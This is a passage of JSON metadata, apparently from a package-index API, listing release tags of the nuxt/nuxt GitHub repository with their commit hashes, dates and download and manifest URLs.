osts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f